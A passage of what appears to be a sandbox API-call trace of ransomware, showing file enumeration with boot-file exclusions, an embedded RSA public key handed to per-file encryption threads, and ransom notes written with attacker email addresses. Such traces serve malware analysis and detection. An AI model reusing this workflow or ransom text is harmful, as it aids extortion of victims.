lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0048.606] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" [0048.606] SetErrorMode (uMode=0x1) returned 0x1 [0048.606] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" [0048.606] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0048.607] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0048.607] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" [0048.607] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x324878 [0048.607] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="Links" [0048.607] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Links" | out: lpString1="Links") returned="Links" [0048.607] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0048.607] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0048.607] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0048.607] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0048.607] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0048.607] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0048.607] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0048.607] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0048.607] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0048.607] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="Desktop") returned 0x0 [0048.607] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="DESKTOP") returned 0x0 [0048.607] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 40 [0048.607] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0048.607] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0048.607] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0048.607] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x588 [0048.608] Sleep (dwMilliseconds=0x96) [0048.761] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0048.761] lstrcmpW (lpString1="Desktop.lnk", lpString2="..") returned 1 [0048.761] lstrcmpW (lpString1="Desktop.lnk", lpString2=".") returned 1 [0048.762] StrStrW (lpFirst="Desktop.lnk", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0048.762] StrStrW (lpFirst="Desktop.lnk", lpSrch="ntldr") returned 0x0 [0048.762] StrStrW (lpFirst="Desktop.lnk", lpSrch="NTLDR") returned 0x0 [0048.762] StrStrW (lpFirst="Desktop.lnk", lpSrch="NTDETECT.COM") returned 0x0 [0048.762] StrStrW (lpFirst="Desktop.lnk", lpSrch="ntdetect.com") returned 0x0 [0048.762] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="Desktop") returned 0x0 [0048.762] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="DESKTOP") returned 0x0 [0048.762] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 40 [0048.762] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0048.762] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Desktop.lnk" | out: lpString1="Desktop.lnk") returned="Desktop.lnk" [0048.762] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0048.762] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5b0 [0048.762] Sleep (dwMilliseconds=0x96) [0048.917] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0048.917] lstrcmpW (lpString1="Downloads.lnk", lpString2="..") returned 1 [0048.917] lstrcmpW (lpString1="Downloads.lnk", lpString2=".") returned 1 [0048.918] StrStrW (lpFirst="Downloads.lnk", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0048.918] StrStrW (lpFirst="Downloads.lnk", lpSrch="ntldr") returned 0x0 [0048.918] StrStrW (lpFirst="Downloads.lnk", lpSrch="NTLDR") returned 0x0 [0048.918] StrStrW (lpFirst="Downloads.lnk", lpSrch="NTDETECT.COM") returned 0x0 [0048.918] StrStrW (lpFirst="Downloads.lnk", lpSrch="ntdetect.com") returned 0x0 [0048.918] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="Desktop") returned 0x0 [0048.918] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="DESKTOP") returned 0x0 [0048.918] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 40 [0048.918] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0048.918] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Downloads.lnk" | out: lpString1="Downloads.lnk") returned="Downloads.lnk" [0048.918] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0048.918] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x5bc [0048.918] Sleep (dwMilliseconds=0x96) [0049.073] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0049.073] lstrcmpW (lpString1="RecentPlaces.lnk", lpString2="..") returned 1 [0049.073] lstrcmpW (lpString1="RecentPlaces.lnk", lpString2=".") returned 1 [0049.074] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0049.074] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch="ntldr") returned 0x0 [0049.074] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch="NTLDR") returned 0x0 [0049.074] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch="NTDETECT.COM") returned 0x0 [0049.074] StrStrW (lpFirst="RecentPlaces.lnk", lpSrch="ntdetect.com") returned 0x0 [0049.074] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="Desktop") returned 0x0 [0049.074] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="DESKTOP") returned 0x0 [0049.074] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 40 [0049.074] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0049.074] lstrcpyW (in: lpString1=0x17cf1c, lpString2="RecentPlaces.lnk" | out: lpString1="RecentPlaces.lnk") returned="RecentPlaces.lnk" [0049.074] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0049.074] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x58c [0049.074] Sleep (dwMilliseconds=0x96) [0049.276] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0049.277] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 1 [0049.277] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 0 [0049.277] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links" [0049.277] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" [0049.277] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="Desktop") returned 0x0 [0049.277] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="DESKTOP") returned 0x0 [0049.277] SetErrorMode (uMode=0x1) returned 0x1 [0049.277] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\_HELP_INSTRUCTION.TXT") returned 57 [0049.277] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0049.277] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0049.277] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x5ac) returned 0x0 [0049.277] RegQueryValueExW (in: hKey=0x5ac, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3de4328, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3de4328*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0049.278] RegCloseKey (hKey=0x5ac) returned 0x0 [0049.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0049.278] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0049.278] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0049.278] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5ac [0049.278] WriteFile (in: hFile=0x5ac, lpBuffer=0x17a4dc*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17a4d4, lpOverlapped=0x0 | out: lpBuffer=0x17a4dc*, lpNumberOfBytesWritten=0x17a4d4*=0x2c4, lpOverlapped=0x0) returned 1 [0049.279] CloseHandle (hObject=0x5ac) returned 1 [0049.279] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x324878 [0049.279] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links") returned="Links" [0049.279] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Links" | out: lpString1="Links") returned="Links" [0049.280] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.280] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.280] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0049.280] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.280] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0049.280] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0049.280] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0049.280] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0049.280] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0049.280] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0049.280] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 1 [0049.280] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 0 [0049.280] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0049.280] lstrcmpW (lpString1="Local Settings", lpString2="..") returned 1 [0049.280] lstrcmpW (lpString1="Local Settings", lpString2=".") returned 1 [0049.280] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0049.280] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0049.280] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Local Settings" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" [0049.280] SetErrorMode (uMode=0x1) returned 0x1 [0049.280] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" [0049.280] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\" [0049.280] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\" [0049.280] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*" [0049.280] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0049.280] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0049.281] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings" [0049.281] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*" [0049.281] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="Desktop") returned 0x0 [0049.281] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\", lpSrch="DESKTOP") returned 0x0 [0049.281] SetErrorMode (uMode=0x1) returned 0x1 [0049.281] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\_HELP_INSTRUCTION.TXT") returned 66 [0049.281] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0049.281] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0049.281] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x5d0) returned 0x0 [0049.281] RegQueryValueExW (in: hKey=0x5d0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3de4558, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3de4558*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0049.281] RegCloseKey (hKey=0x5d0) returned 0x0 [0049.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0049.281] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0049.281] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0049.281] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d0 [0049.282] WriteFile (in: hFile=0x5d0, lpBuffer=0x17a4dc*, 